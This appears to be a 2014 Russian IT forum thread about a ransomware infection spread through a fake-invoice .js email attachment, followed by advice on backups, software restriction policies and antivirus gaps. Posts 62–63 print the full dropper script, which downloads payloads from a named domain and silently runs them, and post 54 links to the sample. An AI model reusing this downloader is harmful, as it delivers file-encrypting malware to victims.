Имя: Пароль:
IT
Админ
зашифрованы файлы keybtc@gmail_com
0 zak555
 
12.08.14
21:52
сегодня бух открыла некий архив, присланный по почте, и запустила из него скрипт

Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js


который в итоге зашифровал все офисные файлы...

куда копать ?
1 butterbean
 
12.08.14
21:53
сговорилиись что-ли
2 jsmith82
 
12.08.14
21:56
дежавю
3 Сержант 1С
 
12.08.14
21:58
копать в сторону премиальной части буха и админа. Буха чтобы в следующий раз не запускала что попало, админа - что позволил крпитовирусу сьесть важные данные. Можно конечно еще кого-нибудь наказать за то, что антивируса нормального нет, но кто ж памятник накажет..
4 zak555
 
12.08.14
22:03
(3) каспер на том компе стоит
5 zak555
 
12.08.14
22:09
сейчас запустил этот скрипт на вирт машине -- зашифровал файлы
6 zak555
 
12.08.14
22:12
virusinfo.info говорит : Без оригинального дешифратора не обойтись
7 zak555
 
12.08.14
22:14
какой программой может промониторить, что происходит в системе ?
8 zak555
 
12.08.14
22:15
или как это скрипт запихнуть в отладчик, что пройти по шагово его ?
9 sda553
 
12.08.14
22:17
(8) Скорее всего шифрует ассимитричным алгоритмом, открытым ключом. поэтому зашифрованное без секретного ключа не расшифровать, даже изучив алгоритм по шагам
10 Сержант 1С
 
12.08.14
22:21
на диске должен лежать текстовый файл в котором координаты товарищей, которые за деньгу помогут расшифровать
берут кстати немного. Две недели назад на вот таком инциденте в таком файле нашел феерическое "напишите сколько сможете выслать". Кризис, видимо.
11 zak555
 
12.08.14
22:24
кстати, без инет скрипт не работает
12 zak555
 
12.08.14
22:32
(10) видел про оплату через крипто-валюту
13 Garykom
 
гуру
12.08.14
22:57
(0) надо было отрубать комп из розетки и потом чем нибудь типа  RStudio восстанавливать

но не прокатить если оно умное и не удаляет, а поверх перезаписывает файлы ))
14 HeroShima
 
12.08.14
23:01
15 zak555
 
12.08.14
23:07
400 EUR за расшифровку
16 Defender aka LINN
 
12.08.14
23:08
У нас один магазин поймал такое. Вздохну, удалил к чертям зашифрованное вместе с вирусом да и все :)
17 HeroShima
 
12.08.14
23:19
(4) virustotal.com как на вирус реагирует?
18 starfront1
 
12.08.14
23:37
Здравствуйте, уважаемые форумчане.
Пишу Вам по той же причине.

Друг по несчастью оплатил и получил ключ, а я вот сомневаюсь - платить или нет... Говорит, что ключ выслали в течение 30 минут и все расшифровал.
Правда, ему цену назвали более-менее приемлемую (около 200 долларов).
Посоветуйте, платить или нет... На антивирусных форумах все равно помощи никакой(((
19 Defender aka LINN
 
12.08.14
23:39
(18) Дата регистрации: 12 августа 2014; сегодня.
Нюню.
20 Garykom
 
гуру
12.08.14
23:41
(19) молодца так их террористов...

и им попавшимся тоже чтобы боялись ))

ЗЫ
тока ip то записать успели?
21 Ctrekoza
 
12.08.14
23:48
(0) От кого пришло? От знакомых контрагентов пришло письмо? Почему открыла?
Как там у Булгакова? "Никогда не говори с незнакомцами..."
22 Партизан
 
13.08.14
00:28
(4) ну сколько раз можно повторять - ни один "каспер" никогда не даст защиты, т.к. все антивирусы основаны на неактуальных черных списках. Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.
23 Сержант 1С
 
13.08.14
00:46
(22) базы платных антивирей актуальны на 99.99999% это раз, во-вторых есть эвристика
24 Партизан
 
13.08.14
00:50
(23) Да неужели? ))) сколько вирусов НЕ содержится в базе? Эвристика фигня.
25 HeroShima
 
13.08.14
01:30
Базы сигнатур более чем на ~10000000 не попадались, в то же время количество известных вирусов оценивается как превышающее 80 миллионов.
26 mehfk
 
13.08.14
05:37
(25) Одна запись в антивирусной базе как правило описывает несколько реальных вирусов.
27 Romyr
 
13.08.14
05:40
http://habrahabr.ru/post/159811/
авось поможет
28 vcv
 
13.08.14
05:49
(23) Как говорится, "жизненный опыт, это знание, как не стоит поступать в ситуации, которая больше никогда не повторится".
Автор шифровальщика успеет собрать профит в тот краткий миг между заказом спам-рассылки и реакцией антивирусных компаний. А уж реакцию эвристики самых распространённых антивирусов автор шафровальщика проверил до того, как оплачивать спамерам рассылку.
29 zak555
 
13.08.14
06:30
(21) да, от контрагента, с которым раньше работали
30 zak555
 
13.08.14
06:32
кстати, там вида ХР стоит
31 Jokero
 
13.08.14
07:55
(0) Копать в поддержку каспера, если он стоит. Зря что ли деньги плачены за лицензию?
32 Сержант 1С
 
13.08.14
08:02
(30) прекрасно! неумный пользователь за дырявой осью
33 Бешеная Нога
 
13.08.14
08:03
заплатите. люди же старались
34 Escander
 
13.08.14
08:13
+ (33) предварительно сообщив в управление-Р... может они ему фаберже открутят
35 Трик
 
13.08.14
08:17
(19) а вдруг он поиском нарвался на тему и зарегился на форуме, что бы узнать что к чему? А ты ему бан :(.
36 Бешеная Нога
 
13.08.14
08:17
кстати в полицию заяву на вымогательство обязательно напишите. лох лохом, но все же пусть полиция ловит преступников.
37 BuHu
 
13.08.14
08:18
(34) или заблокируют ящик , ну что бы никто ему денег не слал , ну и как результат не получит ключ
38 Escander
 
13.08.14
08:20
(37) думаю дним блокированием не ограничатся
39 tdm
 
13.08.14
08:26
(0) обычно платят, на будущее сделать выводы...

а так вообще у них фантазия норм работает одним моим знакомым пришло с вложением мол судебное распоряжение от приставов, от налоговой летит, причем почту придумывают подходящую...или знаю еще более веселый случай когда дважды шифрователь запустили - из разных писем, так один зашифровал а другой перешифровал(или они даже где-то пересеклись), в результате даже хакеры после оплаты ничего не смогли восстановить)))

(34) а вы оптимист! хотя заявление да можно написать
40 Arhangeldk
 
13.08.14
08:53
Вчера клиент тоже такую фигню подцепил. Пыталась открыть какую-то левую счет-факту. И самое интересное что зашифровались только базы 1С и бекапы.
41 Любопытная
 
13.08.14
08:54
(39) Деньги вернули?)
42 Drac0
 
13.08.14
08:54
(41) После жалобы в Роспотребнадзор )))
43 torgm
 
13.08.14
09:01
(8) У меня админ в таких случаях оставляет жить вирус на компе и ловит хэш :)

Сейчас развелось развелось семейство криптовирусов, которые проходят касперского на ура...


Админу однозначно в лоб.
1. Вся важная инфа должна быть расположена на сервере
2. Данные должны бэкапиться ....
44 tdm
 
13.08.14
09:06
(41) ага, в двойном размере)))
...ответом было что-то типа - мы не знали что так можно (сдается мне грядёт шифровальшик 2.0 с новой фитчей - будет требоваться 2 ключа!!!))))
45 HeroShima
 
13.08.14
09:29
(26) Как правило нет.
46 zak555
 
13.08.14
11:41
(32) какая разница ?
этот скрипт та же влезает и в вин7
47 zak555
 
13.08.14
11:42
(33) это самое простое
48 zak555
 
13.08.14
11:44
(37) по скольку вирь стал сам рассылать по адресной книге самого себя, то могу предположить, что в "центр" уже сообщён адрес почты жертвы

это на тот случай, когда ящик заблокировать

чтобы заблокированному написать с другого =)
49 zak555
 
13.08.14
11:45
(43) там один гб+бух+ген
50 Ёпрст
 
13.08.14
11:49
(0) пришли мне этот скрипт на [email protected]
тоже буду рассылать подарки
51 zak555
 
13.08.14
11:53
(50) ушло
52 Fram
 
13.08.14
11:53
(19) и ТС за одно :)
53 zak555
 
13.08.14
11:53
скрипт не сложный
54 zak555
 
13.08.14
11:55
(51) яндекс не пропустил

(50) http://myfolder.ru/files/41442240
55 Ёпрст
 
13.08.14
12:05
(54) какой-то битый архив
56 zak555
 
13.08.14
12:06
(55) он не открывается ?
57 zak555
 
13.08.14
12:07
у меня открывается
58 Злопчинский
 
13.08.14
12:08
Вчера и у меня пытался прорваться вирус аналогичный - вложение типа договор-черновик. нод вроде отловил.
админ в отпуске. посмотрим что будет...
59 Ёпрст
 
13.08.14
12:08
(56) ага
60 zak555
 
13.08.14
12:08
(58) надо было отключить и посмотреть, что внутри
61 Ёпрст
 
13.08.14
12:09
можешь js унутри архива переименовать в txt и еще раз перевыложить ?
62 zak555
 
13.08.14
12:10
содержание

Счета СФ-14-143280, СФ-14-148594, СФ-14-135789 скан-копии LaserJet HP 1490 июль 2014 года бухгалтерия-СОГЛАСОВАНО_Ок для оплаты_DrWeb.Scanned.dос .js




//////////////////// autreplcant je us //////////////////
//////////////////// spm ml to extrcd ////////////////////

////// established ///////

function reps(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}function CreateObject(c){return new ActiveXObject(c)}
var nosensetoabuse="earthlingsfilm.com",tfool="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell"),earthlingsf="%TEMP%\\keybtc.cmd",rotadm="images",WshShell=CreateObject("WScript.Shell"),tfool=WshShell.ExpandEnvironmentStrings(tfool),docs="%TEMP%\\doc.doc";try{reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc"),WshShell.Run(""+docs+"",1,0)}catch(word){}reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc");reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd");WshShell.Run(""+earthlingsf+"",0,0);

/////// goodbye hooray ///////
63 Партизан
 
13.08.14
12:11
у меня нормально открылся:

//////////////////// autreplcant je us //////////////////
//////////////////// spm ml to extrcd ////////////////////

////// established ///////

function reps(c,d)
{
var b=new ActiveXObject("MSXML2.XMLHTTP");
b.onreadystatechange=function()
  {
   if(4===b.readyState)
     {
      var a=new ActiveXObject("ADODB.Stream");
      a.open();
      a.type=1;
      a.write(b.ResponseBody);
      a.position=0;
      a.saveToFile(d,2);
      a.close()
     }
  };
b.open("GET",c,!1);
b.send()
}

function CreateObject(c)
{
  return new ActiveXObject(c)
}

var nosensetoabuse="earthlingsfilm.com",
                    tfool="%TEMP%\\",
                    WshShell=WScript.CreateObject("WScript.Shell"),
                    earthlingsf="%TEMP%\\keybtc.cmd",
                    rotadm="images",
                    WshShell=CreateObject("WScript.Shell"),
                    tfool=WshShell.ExpandEnvironmentStrings(tfool),
                    docs="%TEMP%\\doc.doc";
try
{
  reps("http://"+nosensetoabuse+"/"+rotadm+"/document.btc",""+tfool+"doc.doc";),
  WshShell.Run(""+docs+"",1,0)
}
catch(word){}
reps("http://"+nosensetoabuse+"/"+rotadm+"/day.btc",""+tfool+"day.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/null.btc",""+tfool+"null.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/sad.btc",""+tfool+"sad.btc";);
reps("http://"+nosensetoabuse+"/"+rotadm+"/doc.btc",""+tfool+"keybtc.cmd";);
WshShell.Run(""+earthlingsf+"",0,0);

/////// goodbye hooray ///////
64 zak555
 
13.08.14
12:14
(63) он качает с сайта тело и запускает его
65 Velman
 
13.08.14
12:14
1. Админ нафига дал права на админскую учетку у буха
2. Это не вирус, а тупо шифратор...
3. Админу ноги вырвать и ж...
66 zak555
 
13.08.14
12:16
(65) нету одминов
67 Партизан
 
13.08.14
12:17
(64) Оо у вас разрешены скачка исполняемых файлов пользователям?? )))
68 zak555
 
13.08.14
12:17
(67) ты его запусти у себя
69 Ёпрст
 
13.08.14
12:18
(62) ага, спасиб
просто антивирусняк выкашивает содержимое
:))
70 zak555
 
13.08.14
12:19
(69) яндекс тупо удалил из отправленных и не отправил =)
71 Партизан
 
13.08.14
12:19
(68) че-то не запускается, ибо (22)
72 Velman
 
13.08.14
12:20
скажите своим админам чтоб теневое копирование сделали... Хоть что то, но восстановится! А так платить придется.
73 zak555
 
13.08.14
12:20
(71) так не все же это делают
74 zak555
 
13.08.14
12:20
(72) одинов нет
75 Velman
 
13.08.14
12:21
(74) Экономят?
76 Velman
 
13.08.14
12:23
Или маленькая фирма?
77 zak555
 
13.08.14
12:24
(75) (76) мини фирма
78 zak555
 
13.08.14
12:24
кстати, скрипт отрабатывает даже под обычным пользователем
79 KENT2007
 
13.08.14
12:30
вчера только попались, зашифровалась даже база 1с +флешки+ архивы 1с)
хотя раб стол не тронул. там и был последний архив 1с.
при отправке файлов по инструкции к оплате выставили счет 3.8 тысруб
80 Velman
 
13.08.14
12:39
(77) Мы тоже так разок влетели) у нас на фирме 1400 чел, активных в 1С около 50, спасло архивирование, и то что архив в инет (сервер) не лез. И не в домене.
81 Партизан
 
13.08.14
12:44
вообще, в целях той-же сохранности DBF базы, к примеру (не только от шифраторов, но и от инсайдеров-сливальщиков) , есть большой смысл запретить в правах пользователей листинг директорий, т.е. невозможно будет получить стандартными методами список файлов в каталоге базы. При этом 1С-ка будет нормально работать, т.к. все имена файлов для нее известны заранее.
82 zak555
 
13.08.14
12:44
(22) > Врубайте белый список разрешенных исполняемых файлов и никогда не будете иметь проблем как в (0) даже при отсутствии антивируса.


как средствами винды такое включить ?
83 zak555
 
13.08.14
12:45
(81) это если домен есть
84 Партизан
 
13.08.14
12:47
(83) нет, у меня домена нет, такое используется для защиты баз 1С. Права настроены в свойствах папок на вкладке безопасность.
(82) Локальная политика безопасности / Политики ограниченного использования программ / создать/. По умолчанию / не разрешено. ну и дальше рулить как надо.
85 Velman
 
13.08.14
12:51
Там все юзеры админы что ли?
86 ildary
 
13.08.14
12:58
(81) нельзя ли поподробнее - как это сделать, точнее - какой пункт запретить в NTFS?
87 Партизан
 
13.08.14
12:58
+(84)
здесь подробно:  http://www.windowsfaq.ru/content/view/694/46/
88 Партизан
 
13.08.14
13:02
(86) я щас не на работе, скриншот не могу сделать, вроде "содержимое папки" но не только это.
89 zak555
 
13.08.14
13:15
(85) не админские права всё ранво запускают скрипт

(87) сейчас проверю
90 ildary
 
13.08.14
13:16
(88) я подожду, тема очень интересная, пожалуйста отпиши здесь, как появишься на работе.
91 Velman
 
13.08.14
13:19
(89) Антивирус какой?
92 zak555
 
13.08.14
13:25
(91) на той машины -- был каспер
93 Партизан
 
13.08.14
13:30
(91) ни один антивирус ("проходи, если не в розыске") не поможет, если политика доступа приложений на компьютер будет оставаться "добро пожаловать, гости дорогие!" , а не "Стоять! Кто идет?"
94 NikVars
 
13.08.14
13:36
(92) Понадеялась деваха на парня, стала мамой.
95 Torquader
 
13.08.14
13:42
В общем, есть мнение, что нужно просто переименовать WSCRIPT.EXE и MSHTA.EXE, если вы их не используете.
(А если используете, то поменять расширения).
Тогда "всякая дрянь" не будет запускаться.
P.S. на *.scr я уже поставил запуск программы с сообщением "Вы запустили вирус" - теперь такое же нужно делать и с *.vbs и *.js (ну и *.wsf не забыть).
96 Партизан
 
13.08.14
13:43
(95) какая тяга к изобретению велосипедов с квадратными колесами )
97 Torquader
 
13.08.14
13:44
(81) Можно 1С запускать через RunAs от другой учётки с сохранением пароля (есть такая возможность), тогда к базе 1С будет доступ только у самой 1С.
А ещё лучше браузер запускать из под пользователя guest с очень урезанными правами - проблема только в том, что потом пользователи не могут открыть документы напрямую - но это решается использованием папки запуска где уже js-файл от doc-файла прекрасно отличат.
98 Torquader
 
13.08.14
13:46
Не забываем, что js-файл - это сценарий, и его текст можно достаточно произвольно менять, перенося нужные вызовы из одной функции в другую - так что даже антивирус с эвристикой не поймёт что и к чему.
99 Velman
 
13.08.14
13:54
(93) У нас стоит доктор веб, он в настройках запрещает автозапуск программ. Про хост уже молу даже..
100 13_Mult
 
13.08.14
14:15
Вот опять кого-то зашифровали. ))
Кто же пользователям под админом то даёт работать. Только ограниченную учетку и ни каких вирусов/скриптов. ))
101 zak555
 
13.08.14
14:16
(87) да, уровень безопасности Не разрешено -- запрещает выполнение


а как тогда обмениваться политиками между разными конторами ?
102 zak555
 
13.08.14
14:31
+ (101)

про политики вопрос :

для политики "Локальный компьютер" установил

уровень безопасности -- Не разрешено
применять политику для всех, кроме одминов


почему тогда скрипт по-прежнему не запускается под одмином ?
103 Torquader
 
13.08.14
14:57
(100) Даже если учётка ограничена, то всё равно все пользовательские файлы ей доступны, а то, что вирус в системной директории не побывал - это пользователя не спасает.
Просто, когда потом заходишь под админом, то даже поиск вируса занимает очень много времени (найти exe-файл в куче папок пользователя даже CureIt не сразу может).
104 Ctrekoza
 
13.08.14
14:58
(29) Я не открываю письма, если знаю что не жду от них ничего. Недавно похожее было. Типа пришло коммерческое предложение, я не открыла, т.к. нам от них ничего не нужно было. Самое смешное произошло через два дня. В этом письме появилось новое письмо с новой датой и заголовком типа "я вот недавно подумал.." - рассчитано на слишком любопытных.... Тогда я уже просто перезвонила контрагенту и спросила, они ответили что не отсылали. Письмо пошло в спам без открытия...
105 zak555
 
13.08.14
15:05
(104) значит можешь попасться, когда придёт вирус от нужного контрагента
106 Ctrekoza
 
13.08.14
15:08
(105) В смысле? Я знаю точно чей файл, значит отвечать будет контрагент, если у меня полет базы.
107 zak555
 
13.08.14
15:09
расширения файлов, которые шифрует вирус:
(*.xls *.xlsx *.doc *.docx *.xlsm *.jpg *.cdr *.pdf *.cd *.slddrw *.dwg *.accdb *.ai *.svg *.mdb *.1cd *.zip *.rar *.max)
108 Torquader
 
13.08.14
15:14
(106) Подлинность электронного письма сейчас проверить достаточно сложно, особенно, если используется общедоступный mail-сервер.
109 бомболюк
 
13.08.14
15:14
(107) судя по расширениям 1С 7.7 устояла бы ;-)
110 Torquader
 
13.08.14
15:14
(107) А почему в списке нет txt-файлов ?
111 NikVars
 
13.08.14
15:14
(107) Ты думешь касперу будет интересен твой список?
112 Ctrekoza
 
13.08.14
15:15
(108) Есть же люди, которые занимаются киберпреступностью. Туда заяву и вперед пусть выясняют...
113 Torquader
 
13.08.14
15:17
(112) Так вам нужно чтобы кого-то наказали или чтобы ваши файлы остались целы ?
114 Ctrekoza
 
13.08.14
15:17
(107) Ну 1с точно можно спасти, просто нужно копировать файлы на переносной диск пере выходом в инет с компа, где находится база....
115 NikVars
 
13.08.14
15:18
(112) Пенты очень любят адресные заявы. Заява от конкретика на конкретика. А тут возьни дофига, вероятность потуг большая, а выхлопа не будет. Да и нет ущерба на миллиарды рубликов.
116 Torquader
 
13.08.14
15:18
Кстати, элемент списка контроля доступа "запрет" имеют приоритет над "разрешено", так что любимые фотографии можно просто запретить за запись и удаление всем, кроме особенной учётки.
117 zak555
 
13.08.14
15:18
(110) не знаю
118 Ctrekoza
 
13.08.14
15:18
(113) Мне нужно чтобы остались целы. Ну а наказание мошенникам, пока никто не отменял, в случае форс-мажора...
119 HeroShima
 
13.08.14
15:18
120 zak555
 
13.08.14
15:19
(114) только 8ку нужно переименовать )))
121 Torquader
 
13.08.14
15:20
(114) У меня в одной конторе бухгалтера в инет ходят с одной машины, а вся бухгалтерия - на другой.
122 zak555
 
13.08.14
15:20
(118) ребята на самом деле молодцы
123 Ctrekoza
 
13.08.14
15:20
(120)  Зачем? Тупо копируешь на диск на всякий случай...
124 zak555
 
13.08.14
15:20
(121) в БД копированием ничего не вносят ?
125 zak555
 
13.08.14
15:21
(123) скрипт-шифровальщик идёт по ВСЕ подключённым дискам/флешкам/сетевым ресурсам
126 Ctrekoza
 
13.08.14
15:21
(121)  Я тоже так делаю....
127 Torquader
 
13.08.14
15:21
(124) На компе с БД запустить можно только ограниченный список задач - даже время поменять - говорит "нельзя запускать RunDll32.exe"
128 zak555
 
13.08.14
15:22
(119) кстати, антивирь от мс -- сработал
129 zak555
 
13.08.14
15:26
(127) запустить счет на оплату и словить скрипт
130 Torquader
 
13.08.14
15:27
(128) По идее, антивирус должен срабатывать не на сам скрипт, а на то, что он загружает.
С другой стороны, получение в сценарии какого-то файла и его запуск на исполнение уже должны рассматриваться как вирус.
P.S. с Windows XP для этого был даже поток файла с указанием зоны получения введён, чтобы давать различные разрешения на различные файлы, только почему-то оно так и не заработало, как должно.

И, самое главное, что должен быть правильно настроен firewall, чтобы ни одна программа, кроме браузера, не имела подключение к интернету, а особенно сценарии.
131 HeroShima
 
13.08.14
15:28
(128) Ага. Причем узнал в лицо.
132 NikVars
 
13.08.14
15:28
(121) Это мало защит от загаженных флешек, особенно - после разных там ПФР и налоговых.
133 Ctrekoza
 
13.08.14
15:29
(129) Не пойму. А что его запускать? Открывай только для чтения. Винда сама это делает неплохо.
134 Torquader
 
13.08.14
15:29
(129) Ну и как они его запустят ?
Запустить можно только exe-файл из списка или lnk-файл с подписью.
Ну а если кто-то нажимает на js-файл, он видит его на экране в блокноте - ну и пусть печатают, видят же, что не счёт.
135 zak555
 
13.08.14
15:30
(132) носи в фонды/инспекции sd-карты
136 zak555
 
13.08.14
15:31
(133) это как ?
137 zak555
 
13.08.14
15:31
(134) а винда по умолчанию вызывает программу по выполнению скрипта *?
138 Torquader
 
13.08.14
15:31
(132) Ну на flash-диске прекрасно создаётся папка AUTORUN.INF с файлом внутри, который удалить нельзя (имя файла с ошибкой) и всё.
139 Torquader
 
13.08.14
15:32
(137) regedit.exe вам в помощь - винда прекрасно запоминает, что нужно делать с тем или иным файлом.
140 zak555
 
13.08.14
15:33
(138) почему никак не удалишь ?

(139) сейчас посмотрю
141 NikVars
 
13.08.14
15:34
(138) Ну-ну... Она создается тогда, когда попала в руки админу. В бюстгалтерии - ничего кроме проводок Дт-Кт не создается.
142 HeroShima
 
13.08.14
15:35
К слову о сигнатурах, (62) с обрезанными комментариями:
https://www.virustotal.com/ru/file/703ccfb749c9b0842addd9376aa92c2afd10f220dec60c220b5ca4d34317f34c/analysis/1407929616/
143 zak555
 
13.08.14
15:37
(142) т.е. если убрать комменты, то каспер видит ?
144 HeroShima
 
13.08.14
15:38
(143) Не знаю, но там ещё и формат другой.
145 HeroShima
 
13.08.14
15:41
Не, на одни комменты не реагируют.
146 Партизан
 
13.08.14
23:16
(97) Под одинаковым пользователем 1С запускать нежелательно, а на каждого пользователя дублировать еще одну учетку неприемлемо. Опять-же на каждом рабочем месте ходить запоминать пароли тоже. Проще и надежнее один раз настроить права доступа к файлам, разрешив только те файловые операции (а не просто чтение/запись), которые необходимы и достаточны.
(99) а причем тут автозапуск? Пользователь сам запустит ничего не подозревая.
(102) после внесенных изменений перезагрузи параметры безопасности.
(106) контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП.
(143) нет, если ничего не убирая и не меняя просто отформатировать исходный (62) текст для удобочитатемости, как в (63), то каспер перестает видеть, вот она, хваленая "эвристика" каспера.
147 zak555
 
13.08.14
23:19
(146)

> после внесенных изменений перезагрузи параметры безопасности.

не отработало


> контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП.

контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно
148 Ctrekoza
 
13.08.14
23:35
(146)+(147) +  контрагент ни за что отвечать не будет, если не подписал файл своей ЭЦП. >>
Если подписывает ЭЦП, тогда должна стоять программа Крипто-Про и обычно в этом случае файлы идут через оператора, а он отвечает за безопасность.
ИМХО: вероятность, что такой файл будет нести вирус очень даже низкая, если не нулевая.

контрагент будет отвечать только в том случае, если докажут, что сделал это умышленно>>>
Если нет определенного уровня защиты и доступ к исполняемым файлам у всех, кто подошел к компу, тогда это преступная халатность или провокация преступления... Как-то так :)
149 zak555
 
13.08.14
23:42
(148)

пусть даже другой пример

я подписал архив, в котором каким-то образовал оказался скрипт, который всё шифрует

если получатель его запустит -- всё равно не буду ни за что отвечать, т.к. не было умысла
150 Партизан
 
13.08.14
23:43
(148) а причем тут крипто-про? Для подписания он не обязателен, как и оператор. Много лет назад, когда только начинали работать с ЭЦП, из налоговой нам как-то раз приходил вордовский документ, зараженный вирусом и подписанный ЭЦП.
151 Партизан
 
13.08.14
23:59
(149) >>"т.к. не было умысла"
тогда ч.2 ст 273 ))
"2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок до семи лет."
152 zak555
 
14.08.14
00:04
(151) где такие строки ?

http://www.zakonrf.info/uk/273/
153 Ctrekoza
 
14.08.14
00:11
(150) Теперь всё подписывают КЭП, а она требует установки Крипто. Там по лицензированию оператора это связано... если коротко..
154 zak555
 
14.08.14
00:13
(153) криптоПРО - это один из крипто-программ
есть и бесплатные аналоги
155 Franchiser
 
гуру
14.08.14
00:16
Был у меня один клиент, зашифровались файлы базы 1с7.7 dbf заплатили  хакерам. Ждали чуть больше недели правда. Я столько же денег заработал или даже больше за помощь.
156 Franchiser
 
гуру
14.08.14
00:17
(154) предлагаю с буха взять денег и за его счет решить проблему, ну и себе процент.
157 zak555
 
14.08.14
00:21
(156) денег брать надо с дира, а не буха
158 Ctrekoza
 
14.08.14
00:21
zak555, ты решил свой вопрос и как? Интересно, же...
159 zak555
 
14.08.14
00:24
(158) пока нет

но я почитал на форуме др.веба, что шифровальщик подразделяется на несколько классов -- часть можно уже расшифровать, а часть нет

сейчас компа у меня нет
160 Партизан
 
14.08.14
00:25
(152) вот:
http://www.ukru.ru/code/09/273/
(153) КЭП ? впервые слышу.
161 Ctrekoza
 
14.08.14
00:28
(160) Уже год, как отчетность должна подписываться только КЭП (квалифицированная электронная подпись) приравнена в ГК РФ к собственноручной подписи.
162 Партизан
 
14.08.14
00:29
(161) аа, а я подумал, что КЭП - программа какая-то ))
ну пару реквизитов в сертификат добавили, а суть-то таже.
163 zak555
 
14.08.14
00:30
(161) что значит должна ?
164 zak555
 
14.08.14
00:34
(160) читаем
Федеральный закон Российской Федерации от 7 декабря 2011 г. N 420-ФЗ -- пункт 188) статьи 1


http://www.rg.ru/2011/12/08/p-raboty-site-dok.html
165 Ctrekoza
 
14.08.14
00:39
(163) Отчеты как сдаешь? Вот подписываем теперь всё КЭП (усиленная квалифицированная электронная подпись) сертификация такая. С другой подписью отчет по ТКС не примут. Пойдешь ножками или по почте...
166 zak555
 
14.08.14
00:42
(165) ножками сдаю
167 Ctrekoza
 
14.08.14
00:46
(166)Фи, не стыдно? Чай, не в деревне находишься... Да и НДС теперь по ТКС сдают, как-бы...
Вот первая ссылка, там внутри текста есть ссылки на новый закон по КЭП и декларацию по НДС
http://www.buhonline.ru/pub/tks/2014/4/8529
168 zak555
 
14.08.14
00:48
(167)

а что стыдиться ?
адрес места нахождения юрлица находится недалеко от налоговой, после сдачи отчётов иди за почтой

отказать в приёме ндс на бумаге никто не вправе
169 Ctrekoza
 
14.08.14
00:59
(168) Ну это не совсем так, если выставляете и платите НДС.
------------------
http://www.buhonline.ru/pub/tks/2014/3/8401
ФНС напомнила, что декларации по НДС за первый квартал 2014 года необходимо отправить в электронном виде не позднее 20 апреля
Обязанность по представлению деклараций по НДС исключительно в электронном виде и только через оператора электронного документооборота закреплена за налогоплательщиками пунктом 3 статьи 80 и пунктом 5 статьи 174 Налогового кодекса. Соответствующие изменения в данные нормы были внесены Федеральным законом от 28.06.13 № 134-ФЗ*
170 Партизан
 
14.08.14
01:46
(169) а как быть тем, у кого в округе нет интернета? совсем нет, даже сотовый на улице не ловит.
171 Ctrekoza
 
14.08.14
01:54
(170)  В стать 174 п.5 нет ничего про отсутствие связи. Есть обязанность в электронном виде.
Значит, если живет в лесу,  будет платить ЕСХН, т.е. без НДС....
172 Партизан
 
14.08.14
01:58
(171) как организация, занимающаяся куплей-продажей в розницу может платить сельхозналог? ))
173 Ctrekoza
 
14.08.14
02:03
(172) Так в лесу же...:)
174 Партизан
 
14.08.14
02:15
(173) ну и что, они (2 филиала у нас таких есть) не только в лесу, но и еще дорога к ним не круглый год бывает, а только когда паром ходит и лед замерзнет, причем в одном филиале платежки в банк (чужого региона) на бумаге возят, а другие вообще всегда только за наличку за товаром ездят.
175 Ctrekoza
 
14.08.14
02:40
(174) Значит поедет бух в квартал один раз и сдаст по ТКС через посредника...:)
Ну не пишут они про ваш случай...:)
176 Партизан
 
14.08.14
02:54
(175) а для декларирования по алкоголю, например, представительства, как для ФНС, ПФР, не предусмотрено ))
177 Ctrekoza
 
14.08.14
02:58
(176) Значит покупаете нотик буху и вывозите его на полянку, где берет мобильный модем и ббух усиленно сдает всё и сам сдается..:)
178 Ислам
 
14.08.14
06:01
(19) Зачем разработчика шифратора забанили? Я хотел с ним посоветоваться.
179 Эмбеддер
 
14.08.14
06:15
у нас гл.бух запустила такую штуку в письме "резюме". она зашифровала все документы MS Office и *.jpg на всех своих и общих сетевых дисках. платить все равно не будем))) за такое надо уголовную ответственность, как за кражу автомобильных номеров)))
180 Ислам
 
14.08.14
06:26
(179) никак за такое не накажешь. По сути, те люди, которым переводятся деньги, помогают вам расшифровать файлы, а это не преступление.
Наказать можно тех людей, которые их зашифровали (это ваша гл. бух)
181 Мутабор
 
14.08.14
06:53
Скачал тело
оно даже zip rar 1cd фотки, офисный, корел, кад шифрует. Прикольно
182 Эмбеддер
 
14.08.14
07:02
(180) ну-ну)))
183 Эмбеддер
 
14.08.14
07:03
(180) вопрос, который автору вируса ты собирался задать, видимо, о сотрудничестве в области расшифровки был
184 Мутабор
 
14.08.14
07:12
Ну это не вирус, вирус себя вопроизводит, это другой тип вредоносных программ....
185 Эмбеддер
 
14.08.14
07:16
(184) ну да, правильно сказать - троянец
186 zak555
 
14.08.14
08:29
(169) > Ну это не совсем так, если выставляете и платите НДС.


максимальная ответственность за сдачу декларации НДС в бумажном виде -- 200 р
т.е. 800 р/год

сколько стоит ЭП и лицензия на сдачу через оператора ткс в год ?
187 zak555
 
14.08.14
08:29
(167) (169) и хватит приводить ссылки на г@вняный форум
188 zak555
 
14.08.14
08:31
(184) он и рассылает по адресной книге себя твоим контактам
189 Patrio_
O_Muerte
 
14.08.14
08:57
Нас как то зашифровали, мы оплатили 1500 р и то что мы получили нам ни хрена не помогло, хотя в каком то смысле помощь оказало, но всю расшифровку на себя взяли специалисты Др.Веба, за 2 недели нам прислали готовый скрипт для расшифровки.
190 Jump
 
14.08.14
09:04
(100)Как все просто.
